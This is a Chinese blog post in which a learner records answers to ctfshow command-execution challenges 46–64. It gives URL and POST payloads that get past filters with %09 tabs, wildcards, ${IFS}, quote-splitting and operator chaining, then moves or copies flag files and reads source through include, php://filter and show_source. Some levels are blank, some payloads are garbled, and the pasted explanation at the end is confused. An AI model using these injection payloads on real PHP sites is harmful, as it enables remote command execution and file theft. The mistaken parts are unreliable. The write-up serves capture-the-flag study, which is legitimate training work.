ctfshow 命令执行46关到70关解题思路理解及答案

web安全00x1

已于 2023-12-29 09:20:59 修改

阅读量1.7k

点赞数 52

文章标签： web安全笔记学习

于 2023-12-28 21:52:42 首次发布

本文链接：https://blog.csdn.net/2301_78362619/article/details/135279014

版权

46关

*是一位字符

？是多位字符

百度 ascll

找到 0x30 字符0 那一行代表的意思就是数字

30到39都是数字

?c=tac% fla?.php%26%26ls

这里是空格那么用09 因为解码了所以它不属于数字

输入 ?c=tac%09fla?.php%26%26ls

拿到flag 通关

我拿到flag之后又将靶场重新打开

不看答案打了一遍

心里想着

?c=然后又看到过滤了

tac%

再写个09 写这个是因为ascll编码在百度上搜索的找打了水平制表符 09那一行

fla?.直接查询flag的答案

php因为网站是php代码写的

%26%26是解码之后才有的

ls不变

本关通过须知

你要了解ascll码的表

略略看一下略知一二

那些个二进制就是8421 从左往右看 8421

0000

计算机能够直接识别的是二进制那么2进制不能显示2

只能通过进位或者是 1和02个数字表示

简单理解8421

现在有4个0

我想表示 8

那么就在8的位置下面写个1

答案是1000

如果是表示数字4

那就是0100

表示12

就是1100

同理 16进制不能有16

8进制不能超过8

10进制不能写10

以此类推

网络安全里面也包括二进制安全

制作的木马也是安插在二进制里哦

虽说是有工具但是要手工插入命令进去

如一句话木马免杀木马冰蝎后门菜刀钓鱼邮件

47关

先输入这个

?c=tac09%fla?.php&&ls

然后在网上搜索 url地址转换

将2个符号转换

&& 这2个

得到了%26%26

插入进来

?c=tac%09fla?.php%26%26ls

48关

没有过滤tac 继续用

?c=tac%09fla?.php%26%26ls

轻松拿下下一关

这关表达的意思是

你过滤的再多但凡没有过滤到一个那就相当于没过滤

49关

继续用

?c=tac%09fla?.php%26%26ls

通关

50关

?c=nl<fla"g.php%7C%7Cls

这一关太磨人了

51关

?c=nl<fla"g.php%7c%7Cls

51的答案也是一样的

做不出来

使用方法如上

52关

说明从开始到现在所输入的是不同的方式因为这是站主出的教程他可以直接输入答案但他输入这些错误的还是有原因的

?c=mv${IFS}fla?.php${IFS}a.txt%7c%7cls

然后在列下目录

?c=ls%7c%7cls

这是一个文件夹目录那么操作就是直接访问这个a.txt

为什么不直接输入a.txt

因为要先获取是什么目录

才能直接访问到所需要的最上层目录

访问a.txt之后获得一个假的目录

flag也是假的

输入?c=ls||ls 得到目录表

输入?c=ls${IFS}/||ls

没反应

?c=cp${IFS}/fla?${IFS}/var/www/html/b.txt||ls

然后在列目录

输入?c=ls||ls

表示写进去了

在访问b.txt

拿到flag 通过

原因 cp是复制的意思全称是copy 复制到哪一个根目录或者是目录

用txt格式来访问那个目录以此来回显

53关

?c=ta"c${IFS}fla?.php

?c=ca"tS(IFS)fa?.php

出现了这个又开始了你妹的

54关

?c=ls

?c=mv${IFS}fla?.php${IFS}z.txt

?c=ls 列目录

访问z.txt

通关

在命令执行中，"?c=ls" 不是一个常见的命令或指令。而是一个URL参数或查询字符串的形式。在Web开发中，URL参数通常用于向服务器传递额外的信息。

URL参数或查询字符串是在URL中用于传递额外信息的一种常见方式。它们通常以问号（?）开始，然后是键值对的形式，用等号（=）连接键和值，多个键值对之间使用与号（&）分隔。

55关

56关

57关

58关

由于网站遭受ddos攻击

所以将一些服务关闭

在body输入c=phpinfo();

输入c=system('ls');

也被禁用了

再次尝试 c=echo shell_exec('ls');

被禁用了要看到那里有变化手动输入时警告的后面就显示了

输入直接读取

c=echo file_get_contents('index.php');

没有禁用报错等信息

点击右键查看源代码

盲猜一波

将index换成flag

c=echo file_get_contents('flag.php');

右键源码查看flag

59关

c=echo file_get_contents('flag.php');

上一关的被禁用了

c=include($_GET[1]);

Url

?1=php://filter/convert.base64-encode/resource=flag.php

60关

c=show_source('flag.php');

函数说明

如果eval函数在执行时遇到错误,则抛出异常给调用者.

类似的函数是loadcode ,loadcode并不立即执行代码,而是返回一个函数对象.

并且loadcode支持路径参数,eval并不支持. eval并不支持代码中的return语句,而是将代码作为表达式直接计算出结果.

Hackbar 使用教程什么是Hackbar?Hackbar是一个Firefox的插件,它的功能类似于地址栏,但是它里面的数据不受服务器的相应触发的重定向等其它变化的影响.有网址的载入于访问****,联合查询**,各种编码,数据加密功能.这个Hackbar可以帮助你在测试SQL注入**,XSS漏洞和网站的安全性****,主要是帮助开发人员做代码的安全审计**,检查代码,寻找安全漏洞

输入 c=include($_GET[1]);&a=highlight_file('flag.php');

61关

c=highlight_file('flag.php');

尝试用别的方法

c=show_source('flag.php');

通关

突破禁用函数

这些关卡的逻辑是

知道哪些函数可以进行读文件

62关

c=show_source('flag.php');继续用上一关的也可以通关

换个思路

用include函数直接输出$flag ！！！注意：所标注的是3部分

echo在php代码中的意思是输出

echoc=include('flag.php');echo $flag;

63关

c=show_source('flag.php'); 通关

64关

采用文件包含方式

c=var_dump(get_defined_vars());

发现文件并没有包含进去

根据你提供的信息，这似乎是一个PHP代码片段。它创建了一个包含5个元素的数组，并且每个元素都是一个关联数组。

第一个元素的键是"GET"，值是一个空的关联数组。
第二个元素的键是"POST"，值是一个关联数组，其中包含一个键为"c"的元素，其值是字符串"var dump(get defined vars0):"。
第三个元素的键是"COOKIE"，值是一个空的关联数组。
第四个元素的键是"FILES"，值是一个空的关联数组。
最后一个元素的键是"c"，值是字符串"var dump(get defined vars()"。

这段代码似乎是用于获取和输出定义的变量的信息。其中，通过GET和POST方法传递的变量将被打印出来，而COOKIE和FILES变量则为空。

在这段代码中，如果你想输入文件包含命令，可以尝试修改"POST"数组中的"c"键对应的值。将其修改为你想要包含的文件的路径，可以是相对路径或绝对路径。请确保你输入的文件路径是有效的，并且是你有权限访问的文件。

例如，如果你想包含一个名为"example.php"的文件，可以将代码修改为：

php

插入代码复制代码

array(
    "GET"=> array(),
    "POST"=> array(
        "c"=> "example.php"),
    "COOKIE"=> array(),
    "FILES"=> array(),
    "c"=> "var dump(get defined vars())");